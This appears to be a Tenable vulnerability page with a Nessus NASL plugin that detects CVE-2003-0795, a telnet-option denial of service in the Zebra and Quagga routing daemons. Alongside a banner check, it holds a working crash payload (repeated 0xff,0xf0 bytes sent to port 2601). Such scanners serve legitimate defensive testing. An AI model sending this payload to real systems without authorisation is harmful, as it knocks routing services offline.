Quagga / Zebra Malformed Telnet Command Denial of Service

2003-11-1700:00:00

www.tenable.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.018 Low

EPSS

Percentile

88.1%

JSON

A remote denial of service vulnerability exists in Zebra and Quagga that can be triggered by sending a telnet option delimiter with no actual option data, which causes the daemon to attempt to dereference a typically NULL pointer and crash.

This affects all versions from 0.90a to 0.93b.

# MA 2003-11-17: added Services/zebra + MIXED_ATTACK support

# Changes by Tenable:
# - Updated to use compat.inc (11/16/09)
# - Revised plugin title, removed CVE-2003-0858 (6/27/09)


include("compat.inc");

if(description)
{
        script_id(11925);
        script_version("1.25");

	script_cve_id("CVE-2003-0795");
        script_bugtraq_id(9029);
  	script_xref(name:"RHSA", value:"2003:307-01");

        script_name(english:"Quagga / Zebra Malformed Telnet Command Denial of Service");

 script_set_attribute(attribute:"synopsis", value:
"The remote routing daemon is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"A remote denial of service vulnerability exists in Zebra and Quagga
that can be triggered by sending a telnet option delimiter with no
actual option data, which causes the daemon to attempt to dereference
a typically NULL pointer and crash. 

This affects all versions from 0.90a to 0.93b." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Nov/151" );
 script_set_attribute(attribute:"see_also", value:"http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=107140" );
 script_set_attribute(attribute:"solution", value:
"If using Quagga, upgrade to version 0.96.4 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2003/11/17");
 script_set_attribute(attribute:"vuln_publication_date", value: "2003/11/13");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

        script_summary(english:"Attempts to crash the remote service Zebra and/or Quagga");
        script_category(ACT_MIXED_ATTACK);
        script_copyright(english:"This script is copyright (C) 2003-2018 Matt North");
	script_require_ports("Services/zebra", 2601, 2602, 2603, 2604, 2605);
	script_dependencie("find_service1.nasl");
        script_family(english:"Denial of Service");
        exit(0);
}

include("global_settings.inc");

# Maybe we should try this on any telnet server?
port = get_kb_item("Services/zebra");

if (! port) port = 2601;
if (! get_port_state(port)) exit(0);

if (safe_checks())
{
  banner = get_kb_item("zebra/banner/"+port);
  if (!banner)
  {
    soc = open_sock_tcp(port);
    if(!soc) exit(0);
    banner = recv_line(socket: soc, length: 1024);
    if ( banner ) set_kb_item(name: "zebra/banner/"+port, value: banner);
    close(soc);
  }
  if (banner && egrep(string: banner, 
		pattern: "Hello, this is zebra \(version 0\.9[0-3][ab]?\)"))
    security_warning(port);
  exit(0);
}

if (report_paranoia < 2) exit(0);

soc = open_sock_tcp(port);
if(!soc) exit(0);

s = raw_string(0xff,0xf0,0xff,0xf0,0xff,0xf0);

send(socket:soc, data:s);
r = recv(socket: soc, length:1024);
close(soc);
alive = open_sock_tcp(port);
if(!alive) security_warning(port);
else close(alive);